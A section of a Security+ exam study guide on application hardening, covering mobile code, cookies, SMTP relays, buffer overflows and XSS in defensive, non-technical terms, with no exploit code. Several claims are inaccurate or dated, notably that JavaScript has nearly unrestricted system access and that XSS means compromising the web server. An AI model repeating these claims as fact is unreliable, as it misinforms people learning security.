1.4. Carry out the appropriate procedures to establish application security.

Application hardening is the task of imposing security on required applications and services. This usually involves tuning and configuring the native security features of the installed software and installing supportive security applications as needed. When you're developing new applications in house, it's also important to include security design, implementation, and integration throughout the development process.

Application hardening is often seen as a subelement of operating system hardening. In fact, many of the same steps and procedures used to lock down an operating system are used to harden an application or service. In addition to the general notion of disabling any unneeded protocols and services, you should also disable any unneeded features, functions, or capabilities of a service or protocol based on the server's role and the capabilities your organization needs.

1.4.1. ActiveX

ActiveX is a mobile code technology developed by Microsoft. ActiveX controls or components are stand-alone programs that can be attached to or embedded in web documents to perform a wide range of functions. ActiveX components are executed with the same security privileges as the current user. However, the ActiveX component is saved to the hard drive and can be accessed at a later time, even after you've left the website where it was obtained. Thus, ActiveX can be a significant security issue. It's recommended that ActiveX components not be downloaded or executed except from websites you're sure you can trust. In many cases, web browsers can be configured to always allow, always block, or prompt the user each time an ActiveX component is presented by a website.

One method that helps reduce the number of malicious elements of mobile code downloaded and executed on a system is a mechanism known as applet signing. A signed applet is a piece of mobile code that has been digitally signed using the creator's or owner's certificate. A signed applet clearly indicates to the user the source of the applet. Web browsers can be configured to accept only signed applets or to prompt whenever any applet is offered by a website. It's important to understand that a signed applet only proves the applet's identity or source; it provides no guarantee as to the reliability or quality of the applet. Just because you know where an applet comes from doesn't mean that the applet isn't malicious code or that it won't cause a problem with your computer system.

1.4.2. Java

Java is a programming language created by Sun Microsystems specifically to operate in the distributed environment of the Internet. Java is a write-once, run-anywhere solution that allows a programmer to write an applet once and have it run on any platform. There is a requirement that a Java Virtual Machine (JVM) be installed on every system, but since there is a JVM for every commercial/public OS, this is usually not an issue.

Java is designed to operate within a restricted memory space and execution container known as a sandbox. This limits the functions of Java, which makes it harder to craft malicious code in Java. Java applets are not saved to the hard drive and do not fully take on the access privileges of the user. Thus, Java is designed as a more secure mobile code system. However, there are malicious Java applets and many of them perform social-engineering-based attacks rather than direct code-based attacks.

Java should only be allowed to execute if it is from a known trusted source.

1.4.3. Scripting

Scripting is a type of programming where the lines of the program or script remain in their original human readable form and which does not need to be precompiled to execute. Instead, the OS or a scripting interpreter (such as Perl) will perform JIT (just in time) compiling as needed. Scripting is a powerful and flexible tool used by a wide number of tech-savvy administrators. However, scripting can also be employed for malicious purposes, so it is always a good idea to inspect and/or scan all scripts for malicious code before use.

JavaScript is a scripting programming language that can be embedded directly into the HTML of a web page. It's executed by the web browser and can be used to perform a wide range of functions, both benign and malicious. Unlike its namesake Java, JavaScript doesn't run in a restricted security zone; rather, it has nearly unrestricted access to all system resources. Due to its power and unpredictability, it's generally recommended that you disable the download and execution of JavaScript except from websites you're sure you can trust.

Common Gateway Interface (CGI) is a mechanism developed early in the life of the Web to allow a web browser to submit information from a user back to a web server for processing by a server-side script or application. Although CGI scripting isn't used as widely as JavaScript or ActiveX today, it's still a default-enabled feature of both web servers and web browsers.

CGI has numerous vulnerabilities, the most prevalent of which is the ability of a user to submit data that results in the script's failure, a buffer overflow attack, or the performance of an unauthorized or unwanted activity (at least from the perspective of the web server owner).

Another issue with CGI is that all directories on the web server that host CGI scripts must be configured to allow web visitors to execute files. If the web server's folder hierarchy isn't properly protected, this could enable a user to upload their own scripts and then execute them.

To protect against CGI vulnerabilities, either don't use it or properly lock down the web folders appropriately. Also, thoroughly inspect all CGI scripts for malicious code before use. When possible, write your own scripts rather than use someone else's.

1.4.4. Browser

A browser (or web browser) is the client software used to interact with the Web. Browsers are usually graphical in nature, but there are several popular text-only or command-line browsers. Browsers grant users access to the vast repositories of information and resources distributed around the globe via the Internet's World Wide Web. Unfortunately, browsers bring security risks to their host computers.

A browser can be used to access malicious websites, which can result in information leakage, identity theft, or downloading of malicious code. It is important to practice safe surfing habits by being cautious and not downloading content from sources you don't fully trust.

Browsers should be kept current with patches and updates from the vendor. The OS should be hardened, and both a firewall and antivirus software should be running and kept updated. Block access to all known risky or malicious sites. Only accept downloadable code from known trusted and signed sources.

1.4.5. Buffer overflows

Software exploitation attacks are directed toward known flaws, bugs, errors, oversights, or normal functions of the operating system, protocols, services, or installed applications. One of the most common forms of software exploitation is a buffer overflow attack.

A buffer overflow attack occurs when an attacker submits data to a process that is larger than the input variable is able to contain. Unless the program is properly coded to handle excess input, the extra data is dropped into the system's execution stack and may execute as a fully privileged operation. Buffer overflow attacks can result in system crashes, corrupted data, user privilege escalation, or just about anything a hacker can think of. The only countermeasures to buffer overflow attacks are to patch the software when issues are discovered and to properly code software to perform input validation checks before accepting input for processing.

Once a weakness is discovered in software, a hacker often writes an exploit or attack tool. These tools are easily accessible on the Internet. They allow anyone to grab the tool and point it at a victim to perform the attack, even when the attacker has no knowledge of how to perform the attack.

A buffer overflow occurs when a program receives input that is larger that it was designed to accept or process. The extra data received by the program is shunted over onto the CPU without any security restrictions; it's then allowed to execute (assuming it's a valid command, script, system call, and so on) with system-level privileges. There are many possible results of a buffer overflow, including a program crash, a system freeze or crash, opening a port, disabling a service, creating a user account, elevating the privileges of an existing user account, accessing a website, or executing a utility. Clever attackers can do just about anything they wish if they can execute a command or script unrestricted access to a system.

Sometimes a buffer overflow attack can be labeled as a form of DoS attack, since a buffer overflow occurs when a system receives more data than it can handle (a bit like a flooding attack). This is especially true when the buffer overflow event results in a system no longer being able to process legitimate data or requests.

Poor programming quality controls and not including input validation checks in software lead to buffer overflow attacks. Unfortunately, there is little commercial software that isn't vulnerable to buffer overflow attacks; web server software is attacked most frequently. Fortunately, buffer overflow vulnerabilities are often easily patched with vendor updates.

1.4.6. Cookies

A cookie is a tracking mechanism developed for web servers to monitor and respond to a user's serial viewing of multiple web pages. A cookie is often used to maintain an e-commerce shopping cart, focus product placement, or track your visiting habits. However, the benign purposes of cookies have been subverted by malevolent entities. Now cookies are a common means of violating your privacy by gathering information about your identity, logon credentials, surfing habits, work habits, and much more. A cookie can be easily exploited against a web browser to gather sufficient information about a user to allow the attacker to impersonate the victim online. It's generally recommended that you block third-party cookies from everyone and first-party cookies from all but the most trusted sites. Trusted sites are usually those entities that protect your identity by not including such details in a cookie. Instead, these sites only place a session ID in the cookie and thus keep all of your personal information in a backside database. Without allowing trusted first-party cookies (a.k.a. session cookies), functions such as e-commerce shopping carts, online banking, and even posting to discussion forums would be disabled.

1.4.7. SMTP open relays

E-mail is the most widely used communication vehicle on the Internet. However, it has also become one of the primary delivery mechanisms for malicious code and social-engineering attacks. Understanding e-mail security issues is essential to the Security+ exam.

Internet-based e-mail relies primarily on a single protocol: Simple Mail Transport Protocol (SMTP). As you can see in Figure 1.1, SMTP has proven itself over more than 20 years as a reliable e-mail delivery system. However, it has one significant flaw: its nearly complete lack of security. SMTP doesn't offer encryption for transmitted messages. Thus, any and all e-mail can be snooped and examined. As e-mail becomes the basis for business communications, cleartext communication is no longer a viable option. Fortunately, SMTP supports add-on capabilities that bring encryption and other security services to e-mail. SMTP operates over TCP port 25.

Other protocols are involved with a complete e-mail solution. Post Office Protocol (POP3) and Internet Message Access Protocol (IMAP) are used to pull e-mail from an e-mail server down to a client, but they aren't involved in moving e-mail across the Internet. POP3 operates over TCP port 110, and IMAP operates over TCP port 143. Because e-mail is natively insecure, several encryption options have been developed to add security to e-mail used over the Internet. Two of the most common solutions are Secure Multipurpose Internet Mail Extensions (S/MIME) and Pretty Good Privacy (PGP).

S/MIME is an Internet standard for encrypting and digitally signing e-mail. It uses RSA (an asymmetric encryption scheme) to encrypt and protect e-mail.

PGP is used to encrypt and digitally sign e-mail messages. It uses RSA or Diffie-Hellman asymmetric cryptography solutions.

SMTP relay is the feature or function of an SMTP or e-mail server when it receives an e-mail from a client or other SMTP server and then forwards it on to another SMTP server. The forwarding action is similar to normal network packet routing, in that the purpose is to transmit the e-mail message to its destination. E-mail relaying is an essential part of the success of Internet e-mail, but it can be abused.

E-mail relaying abuse often leads to DoS attacks or spam. Spam (specifically, spoofed spam) is often sent by rogue solicitors who find e-mail servers on the Internet that aren't properly configured to authenticate clients and servers before accepting e-mail. When an SMTP server fails to authenticate clients and servers before accepting e-mail, it's known as an open relay.

When you're deploying and securing an SMTP server, it's important to disable the open relay feature. However, even after an SMTP server has been secured, a clever attacker may be able to reenable relaying using a Trojan horse, buffer overflow, or remote access attack against the system. Thus, it's important to regularly check the performance logs and configuration settings of e-mail servers. One important item to look for is the presence of a universal acceptance configuration that would allow for the unrestricted and unverified relaying of e-mail. For example, on Unix systems, the e-mail server will have a list of domains that are authorized to submit e-mail. If this file includes a universal include coding statement, which is usually represented by a dot and an asterisk (.*), delete that entry and reboot the system to force the change to take effect.

1.4.8. Instant messaging

Instant messaging (IM) is a mechanism that allows for real-time text-based chat between two users located anywhere on the Internet. Some IM utilities allow for file transfer, multimedia, voice and video conferencing, and more. However, unlike many Internet information services, such as the Web, FTP, and e-mail, IM is a peer-to-peer service. There is no need for a centralized controlling server. This makes IM easy for end users to deploy and use, but it's difficult to manage from a corporate perspective. IM is insecure. It has numerous vulnerabilities, such as susceptibility to packet sniffing, it lacks true native security capabilities, and it provides no protection for privacy.

Instant messaging offers little in the way of security or privacy. Many IM clients are susceptible to malicious code deposit or infection through their file transfer capabilities. Also, IM users are often subject to numerous forms of social-engineering attacks, such as impersonation or convincing a victim to reveal information that should remain confidential (such as passwords).

Most IM clients don't use encryption when transmitting messages. Thus, most communications are subject to packet sniffing and eavesdropping attacks.

IM clients do not provide any direct protection for user privacy. The fact that IM clients perform communications in the clear and do not offer encryption or security services makes all private and confidential transmissions subject to packet sniffing and eavesdropping attacks.

1.4.9. P2P

P2P (peer to peer) is a file-sharing system that allows for the decentralized distribution of files over the Internet. P2P can be used to distribute legitimate free, open-source, or public content. However, P2P is often used to distribute illegal content such as pirated music, software, and movies. There are many varieties of P2P mechanisms; one of the more prevalent systems is known as BitTorrent.

Because P2P is a file distribution system, common precautions should be taken. First, try not to download files from untrusted sources. Second, scan every file with an antivirus scanner before use. Third, don't access or distribute content that is not free and legal to distribute. Even with these precautions, P2P can be a bandwidth hog and there is always the possibility that the P2P software can involve your system in distributing illegal content even without your direct permission. Because of these issues, organizations often ban P2P as a standard policy.

1.4.10. Input validation

Input validation is an aspect of defensive programming intended to ward off a wide range of input-focused attacks, such as buffer overflows and fuzzying. A fuzzying attack occurs when an attacker sends a variety of types and sizes of content to input points to see if they can trigger an abnormal response. Input validation checks each and every input received before it is allowed to be processed. The check could be a length, character type, language type, domain, or even timing check to prevent unknown, unwanted, or unexpected content to make it to the core program.

1.4.11. Cross-site scripting (XSS)

Cross-site scripting (XSS) is a form of malicious code injection attack where an attacker is able to compromise a web server and inject their own malicious code into the content sent to other visitors. Hackers have discovered numerous and ingenious methods to inject their own malicious code into websites via CGI scripts, web server software vulnerabilities, SQL injection attacks, frame exploitation, DNS redirects, cookie hijacks, and many other forms of attack. A successful XSS attack could result in identity theft, credential theft, data theft, financial losses, or planting of remote control software on visiting clients.

Defenses against XSS include maintaining a patched web server, using firewalls, and auditing for suspicious activity. As a web user, you can defend against XSS by keeping your system patched, running antivirus software, and avoiding nonmainstream websites.

1.4.12. Exam Essentials

ActiveX

ActiveX is a mobile code framework from Microsoft. ActiveX controls take on the privileges of the user. Only allow signed applets from sites you trust.

Java

Java is a mobile code language from Sun Microsystems. Java was designed as a secure solution for the distributed Internet. Java runs in a sandbox.

JavaScript

JavaScript is a scripting programming language that can be imbedded directly into the HTML of a web page. JavaScript, unlike its namesake Java, doesn't run in a restricted security zone; rather, it has nearly unrestricted access to all system resources. Due to its power and unpredictability, it's generally recommended that you disable the download and execution of JavaScript except from those websites you're sure you can trust.

Signed applets

A signed applet is a piece of mobile code that has been digitally signed using the creator's or owner's certificate. A signed applet clearly indicates to the user the source of the applet.

Buffer overflows

Buffer overflows occur due to a lack of secure defensive programming. The exploitation of a buffer overflow can result in a system crash or arbitrary code execution. A buffer overflow occurs when a program receives input that is larger that it was designed to accept or process. The extra data received by the program is shunted over onto the CPU without any security restrictions; it's then allowed to execute. Results of buffer overflows can include a program crash, a system freeze or crash, opening a port, disabling a service, creating a user account, elevating the privileges of an existing user account, accessing a website, or executing a utility.

Cookies

A cookie is a tracking mechanism developed for web servers to monitor and respond to a user's serial viewing of multiple web pages. A cookie may allow identity theft.

SMTP open relay

An SMTP open relay can be abused to send spam, hoaxes, or malicious attachments.

SMTP

Simple Mail Transport Protocol (SMTP) moves e-mail messages across the Internet from sender to recipient. It doesn't include native encryption. It operates over TCP port 25.

POP3 and IMAP

Post Office Protocol (POP3) and Internet Mail Access Protocol (IMAP) are used to pull e-mail from an e-mail server down to a client. POP3 operates over TCP port 110. IMAP operates over TCP port 143.

XSS

Cross-site scripting (XSS) is a form of malicious code injection attack where an attacker is able to compromise a web server and inject their own malicious code into the content sent to other visitors.

Application hardening

Application hardening is the task of imposing security on required applications and services. This usually involves tuning and configuring the native security features of the installed software and installing supportive security applications as needed. When you're developing new applications in house, it's also important to include security design, implementation, and integration throughout the development process.